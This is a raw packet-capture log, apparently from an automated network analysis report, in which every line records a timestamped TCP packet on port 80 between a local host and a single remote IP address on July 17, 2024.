                                                                            Jul 17, 2024 15:19:56.723695993 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.723709106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.723721027 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.723731995 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.723772049 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.752170086 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.752247095 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.752320051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.752341986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.752396107 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.752899885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.752917051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.752984047 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.804507017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.804625034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.804642916 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.804862976 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.805177927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.805195093 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.805247068 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.805833101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.805849075 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.805866003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.805886984 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.805910110 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.806616068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.806634903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.806690931 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.807218075 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.807234049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.807250977 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.807301044 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.808286905 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.808305025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.808321953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.808348894 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.808381081 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.809154034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.809171915 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.809186935 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.809204102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.809225082 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.809257984 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.810118914 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.810136080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.810151100 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.810190916 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.811089993 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.811106920 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.811122894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.811146021 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.811182022 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.812053919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.812072039 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.812087059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.812103033 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.812130928 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.812150955 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.812853098 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.812870026 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.812886953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.812922001 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.813648939 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.813667059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.813680887 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.813711882 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.813738108 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.814392090 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.814409018 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.814424992 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.814441919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.814469099 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.814498901 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.815162897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.815181017 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.815196037 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.815244913 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.815947056 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.815964937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.815979958 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.816008091 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.816037893 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.816750050 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.816766977 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.816782951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.816801071 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.816816092 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.816850901 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.817492962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.817511082 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.817527056 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.817564964 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.818288088 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.818305969 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.818324089 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.818342924 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.818375111 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.819005966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819022894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819039106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819055080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819070101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819087029 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.819139957 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.819937944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819956064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819974899 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.819997072 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.820025921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.844283104 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.844393015 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.844407082 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.844523907 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.844629049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.844645977 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.844661951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.844693899 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.844732046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.845455885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.845473051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.845489025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.845549107 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.846118927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.846136093 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.846213102 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.897624969 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.897753000 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.897758961 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.897769928 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.897829056 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.898215055 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.898231983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.898247004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.898307085 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.898977041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.898993969 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.899008989 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.899024010 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.899034023 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.899076939 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.899714947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.899734020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.899749994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.899770975 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.899808884 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.900460005 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.900476933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.900501013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.900559902 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.901233912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.901252985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.901268959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.901285887 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.901292086 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.901959896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.901978016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.901993036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.901994944 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.902014017 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.902054071 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.902723074 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.902740955 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.902755976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.902772903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.902807951 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.902838945 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.903462887 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.903481007 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.903496981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.903531075 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.904206038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904223919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904241085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904263020 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.904293060 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.904855967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904877901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904892921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904907942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904922962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.904951096 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.904984951 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.905616045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.905635118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.905652046 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.905668020 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.905670881 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.905715942 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.906424046 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.906441927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.906460047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.906476021 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.906476974 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.906491995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.906516075 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.906553984 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.907224894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.907241106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.907255888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.907272100 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.907306910 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.907339096 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.908018112 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908035994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908051968 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908068895 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908083916 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908087969 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.908113956 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.908818007 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908835888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908850908 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908865929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.908869982 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.908905029 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.909665108 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.909682989 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.909698963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.909712076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.909729004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.909765959 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.910427094 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.910446882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.910463095 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.910478115 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.910480976 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.910495996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.910516977 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.910562038 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.911246061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.911262989 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.911278009 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.911293983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.911334991 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.911370039 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.912018061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912034035 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912050009 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912065029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912081003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912089109 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.912098885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912115097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.912153006 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.912919998 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912936926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912951946 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912967920 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.912983894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.913005114 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.913039923 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.913860083 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.913877964 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.913892031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.913908005 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.913914919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.913923979 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.913939953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.913963079 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.914005041 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.914688110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.914705038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.914747953 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.915040016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.915057898 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.915075064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.915091038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.915098906 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.915123940 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.915340900 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.915369987 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.937104940 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.937174082 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.937217951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.937236071 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.937283993 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.937576056 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.937592983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.937608004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.937624931 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.937638044 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.937680006 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.989660025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.989708900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.989726067 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.989881992 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.990114927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990133047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990144968 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990158081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990173101 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.990226030 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.990748882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990761995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990772963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990784883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990797043 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.990802050 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.990825891 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.990859032 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.991633892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.991655111 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.991666079 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.991731882 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.992122889 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.992136002 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.992146969 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.992160082 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.992171049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.992172956 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.992212057 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.992245913 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.993098974 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.993113041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.993124008 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.993136883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.993148088 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.993155956 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.993160009 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.993208885 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.994040966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.994054079 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.994066000 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.994076967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.994087934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.994102955 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.994121075 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:56.995001078 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995013952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995023966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995038033 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995049953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:56.995058060 CEST4970480192.168.2.538.180.60.246
